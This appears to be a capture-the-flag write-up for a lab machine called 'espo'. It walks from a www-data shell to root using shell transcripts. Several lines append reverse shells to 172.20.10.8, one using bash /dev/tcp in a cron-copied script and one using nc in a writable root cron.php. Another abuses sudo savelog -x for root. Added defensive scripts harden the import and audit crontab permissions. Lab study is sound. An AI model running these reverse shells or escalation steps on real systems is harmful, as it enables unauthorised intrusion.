(remote) www-data@espo:/opt$ ls -la
total 8
drwxr-xr-x 2 root root 4096 Dec 4 16:44 .
drwxr-xr-x 18 root root 4096 Dec 4 07:02 ..
(remote) www-data@espo:/opt$ cd ..
(remote) www-data@espo:/$ ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
(remote) www-data@espo:/$ cd home
(remote) www-data@espo:/home$ ls
mandie
(remote) www-data@espo:/home$ cd mandie/
(remote) www-data@espo:/home/mandie$ ls
copyPics pictures user.txt videos
(remote) www-data@espo:/home/mandie$ file *
copyPics: Bourne-Again shell script, ASCII text executable
pictures: directory
user.txt: regular file, no read permission
videos: directory
(remote) www-data@espo:/home/mandie$ cat copyPics
(see below)
(remote) www-data@espo:/home/mandie$ cd pictures/
(remote) www-data@espo:/home/mandie/pictures$ ls
bedroom.jpg burger.jpeg dad-baby.jpg dorothy.jpeg family.jpg maldives.jpg
(remote) www-data@espo:/home/mandie/pictures$ cd ../videos/
(remote) www-data@espo:/home/mandie/videos$ ls -la
total 6632
drwxr-xr-x 2 mandie mandie 4096 Apr 4 08:30 .
drwxr-xr-x 6 mandie mandie 4096 Apr 4 08:30 ..
-rw-r--r-- 1 mandie mandie 6779935 Apr 4 08:30 sky.mp4
(remote) www-data@espo:/home/mandie/videos$ cd ..
(remote) www-data@espo:/home/mandie$ ls -la
total 48
drwxr-xr-x 6 mandie mandie 4096 Apr 4 08:32 .
drwxr-xr-x 3 root root 4096 Jan 24 19:01 ..
lrwxrwxrwx 1 root root 9 Jan 26 19:39 .bash_history -> /dev/null
-rw-r--r-- 1 mandie mandie 220 Dec 4 15:42 .bash_logout
-rw-r--r-- 1 mandie mandie 3526 Dec 4 15:42 .bashrc
drwxr-xr-x 3 mandie mandie 4096 Dec 4 15:42 .local
drwxr-xr-x 12 mandie mandie 4096 Dec 4 15:42 .oh-my-zsh
-rw-r--r-- 1 mandie mandie 807 Dec 4 15:42 .profile
-rw-r--r-- 1 mandie mandie 3890 Dec 4 15:42 .zshrc
-rwxr-xr-- 1 mandie mandie 493 Dec 4 15:42 copyPics
drwxr-xr-x 2 mandie mandie 4096 Apr 4 08:32 pictures
-rwx------ 1 mandie mandie 33 Jan 24 19:01 user.txt
drwxr-xr-x 2 mandie mandie 4096 Apr 4 08:32 videos
Found a script:
#!/bin/bash
SOURCE_MEDIAS="/var/shared_medias"
PICTURES_DIR="$HOME/pictures"
VIDEOS_DIR="$HOME/videos"
/usr/bin/find "$SOURCE_MEDIAS" ! -executable -exec /usr/bin/cp {} "$HOME" 2>/dev/null \;
mkdir -p "$PICTURES_DIR" "$VIDEOS_DIR"
declare -A directory_mappings
directory_mappings=( ["$PICTURES_DIR"]="jpeg jpg" ["$VIDEOS_DIR"]="mp4 avi" )
for dir in "${!directory_mappings[@]}"; do
    for ext in ${directory_mappings[$dir]}; do
        mv "$HOME"/*.$ext "$dir/" 2>/dev/null
    done
done
Method 1: use copyPics to get the user, then root
The script copies the non-executable files in /var/shared_medias into its own home directory. So we need a file that our user cannot execute but mandie can, and that is the script itself: copy it into /var/shared_medias with a reverse-shell command appended at the end and see whether it calls back. This is presumably a scheduled task, though not certain; finish this first, then upload pspy64 to watch:
cd /var/shared_medias
cp /home/mandie/copyPics copyPics
echo "/bin/bash -i >& /dev/tcp/172.20.10.8/2345 0>&1" >> copyPics
We can see it is indeed a scheduled task. Method 2 below instead uses a scheduled task running as root to escalate directly.
And we get a shell!
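The weakness in copyPics is the `find ... -exec cp {} "$HOME"` step: anything dropped into the world-writable /var/shared_medias is copied into mandie's home before the extension filter runs, so a planted file named copyPics (or a dotfile such as .bashrc) replaces the user's own file and takes effect on the next scheduled run. As an added example, not the script from the box, here is a rewritten import routine that only takes regular files with a media extension, copies them straight into the target directories and never overwrites; the sample share directory, its file names and the temp home directory are constructed:

```sh
#!/bin/sh
# Added example, not the box's copyPics: a hardened rewrite of its import logic.
# Only top-level regular files (symlinks skipped, dotfiles skipped by the glob) with a
# media extension are copied, directly into the media directory rather than $HOME,
# an existing destination is never overwritten, and execute bits are cleared.
# Source and home are parameters so the routine can run on constructed temp dirs.

import_media() {
  # usage: import_media SOURCE_DIR HOME_DIR
  src=$1; home=$2
  pictures="$home/pictures"; videos="$home/videos"
  mkdir -p "$pictures" "$videos"

  for f in "$src"/*; do
    [ -f "$f" ] && [ ! -L "$f" ] || continue   # regular files only, no symlinks
    name=${f##*/}
    ext=$(printf '%s' "${name##*.}" | tr 'A-Z' 'a-z')
    case "$ext" in
      jpg|jpeg) dest=$pictures ;;
      mp4|avi)  dest=$videos ;;
      *)        continue ;;                     # scripts, configs, anything else: ignored
    esac
    if [ -e "$dest/$name" ]; then               # never overwrite existing data
      printf 'skip (exists): %s\n' "$name" >&2
      continue
    fi
    cp -- "$f" "$dest/$name" && chmod a-x "$dest/$name"
  done
}

make_sample_share() {
  # Constructed stand-in for /var/shared_medias; prints the directory path.
  d=$(mktemp -d)
  printf 'jpeg bytes\n'   > "$d/photo.JPG"
  printf 'mp4 bytes\n'    > "$d/clip.mp4"
  printf 'echo planted\n' > "$d/copyPics"      # same name as the user's script
  printf 'planted rc\n'   > "$d/.bashrc"       # dotfile
  printf 'plain text\n'   > "$d/notes.txt"     # not a media extension
  ln -s "$d/photo.JPG" "$d/link.jpg"           # symlink carrying a media extension
  printf '%s\n' "$d"
}

# usage: run the import against constructed directories and show what landed where
share=$(make_sample_share)
home_dir=$(mktemp -d)
printf 'original script\n' > "$home_dir/copyPics"
import_media "$share" "$home_dir"
find "$home_dir" -type f
```

Only photo.JPG and clip.mp4 end up under pictures/ and videos/; the planted copyPics, the dotfile, the text file and the symlink are all left in the share, and the user's original copyPics keeps its content. The other half of the fix is operational: a directory that feeds a scheduled job should not be world-writable (the box's /var/shared_medias is drwxrwxrwt).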
Escalating to root
(remote) mandie@espo:/home/mandie$ sudo -l
sudo: unable to resolve host espo: Name or service not known
Matching Defaults entries for mandie on espo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User mandie may run the following commands on espo:
(ALL : ALL) NOPASSWD: /usr/bin/savelog
(remote) mandie@espo:/home/mandie$ /usr/bin/savelog
(remote) mandie@espo:/home/mandie$ /usr/bin/savelog -h
Usage: savelog [-m mode] [-u user] [-g group] [-t] [-c cycle] [-p]
[-j] [-C] [-d] [-l] [-r rolldir] [-n] [-q] file ...
-m mode - chmod log files to mode
-u user - chown log files to user
-g group - chgrp log files to group
-c cycle - save cycle versions of the logfile (default: 7)
-r rolldir - use rolldir instead of . to roll files
-C - force cleanup of cycled logfiles
-d - use standard date for rolling
-D - override date format for -d
-t - touch file
-l - don't compress any log files (default: compress)
-p - preserve mode/user/group of original file
-j - use bzip2 instead of gzip
-J - use xz instead of gzip
-1 .. -9 - compression strength or memory usage (default: 9, except for xz)
-x script - invoke script with rotated log file in $FILE
-n - do not rotate empty files
-q - suppress rotation message
file - log file names
(remote) mandie@espo:/home/mandie$ find / -name "*.log" 2>/dev/null
/var/www/html/data/logs/espo-2023-12-04.log
/var/www/html/data/logs/espo-2024-01-24.log
/var/www/html/data/logs/espo-2024-04-04.log
/var/log/alternatives.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/dpkg.log
/var/log/php8.2-fpm.log
/var/lib/mysql/ddl_recovery-backup.log
/var/lib/mysql/ddl_recovery.log
(remote) mandie@espo:/home/mandie$ sudo /usr/bin/savelog -x /var/log/nginx/access.log
sudo: unable to resolve host espo: Name or service not known
(remote) mandie@espo:/home/mandie$ sudo /usr/bin/savelog -x bash /var/log/nginx/access.log
sudo: unable to resolve host espo: Name or service not known
root@espo:/home/mandie# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@espo:/home/mandie# cat /root/root.txt
0f4580e1632070ea32ead6334c0527c4
Method 2: root directly through the scheduled task
The group owner ll104567 found another way, possibly an Easter egg left by the author: while monitoring processes, a scheduled task running with administrator privileges fires, and the task file is writable!
echo "system('nc 172.20.10.8 3456 -c /bin/bash');" >> cron.php
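The cron.php finding is a root scheduled job whose target file is writable by an unprivileged account (www-data owns /var/www/html on this box). As an added example, not from the write-up, the following shell function audits a system-format crontab (minute hour dom month dow user command, as in /etc/crontab and /etc/cron.d/*) for exactly that: a path in a job command that is not owned by the expected uid or is group/world-writable. The crontab and the scripts it references are constructed in a temp dir; the box's real root crontab is not shown on the page, so the `php .../cron.php` line is an assumption:

```sh
#!/bin/sh
# Added example, not from the original write-up: flag scheduled jobs whose target
# file can be modified by someone other than the account the job runs as.

audit_crontab() {
  # usage: audit_crontab CRONTAB_FILE TRUSTED_UID
  # Prints "user path" for each absolute path in a job command that is a regular
  # file and is either not owned by TRUSTED_UID or writable by group or others.
  cron_file=$1; trusted=$2
  while IFS= read -r line; do
    case "$line" in
      ''|'#'*|[A-Za-z_]*=*) continue ;;   # blank, comment, VAR=value
    esac
    set -f                                 # no globbing: schedule fields contain '*'
    set -- $line
    set +f
    case "$1" in
      @*) [ $# -ge 3 ] || continue; job_user=$2; shift 2 ;;   # @reboot, @daily, ...
      *)  [ $# -ge 7 ] || continue; job_user=$6; shift 6 ;;   # 5 time fields + user
    esac
    for word in "$@"; do
      case "$word" in /*) ;; *) continue ;; esac
      [ -f "$word" ] || continue
      # -user with a numeric uid and -perm -mode (all listed bits set) are portable tests
      if [ -n "$(find "$word" -maxdepth 0 \( ! -user "$trusted" -o -perm -020 -o -perm -002 \) 2>/dev/null)" ]; then
        printf '%s %s\n' "$job_user" "$word"
      fi
    done
  done < "$cron_file"
}

make_sample_cron() {
  # Constructed crontab plus two target files; prints the temp dir path.
  d=$(mktemp -d)
  printf '<?php echo "cron";\n' > "$d/cron.php"
  chmod 666 "$d/cron.php"             # world-writable: the weak case
  printf '#!/bin/sh\nexit 0\n' > "$d/backup.sh"
  chmod 755 "$d/backup.sh"            # owner-only write: the corrected case
  cat > "$d/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root php $d/cron.php
30 2 * * * root $d/backup.sh
@reboot root $d/backup.sh
EOF
  printf '%s\n' "$d"
}

# usage: audit the constructed crontab, trusting files owned by the current uid
dir=$(make_sample_cron)
audit_crontab "$dir/crontab" "$(id -u)"
```

On a real host you would pass 0 as the trusted uid for root jobs and run it over /etc/crontab and every file in /etc/cron.d. The remediation for the flagged case is to have root run its own copy of the script from a root-owned, 0755 location rather than a file inside the web root.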
Now let's grab user.txt:
(remote) root@espo:/var/www/html# cd /home
(remote) root@espo:/home# cd mandie/
(remote) root@espo:/home/mandie# cat user.txt
b462a4ac056477047a56ea23e6bbce19
Box done!
Bonus
Common commands for upgrading a shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
(ctrl+z)
stty raw -echo;fg
reset
Write-up by 28: https://28right.blogspot.com/2024/03/espo-hackmyvm.html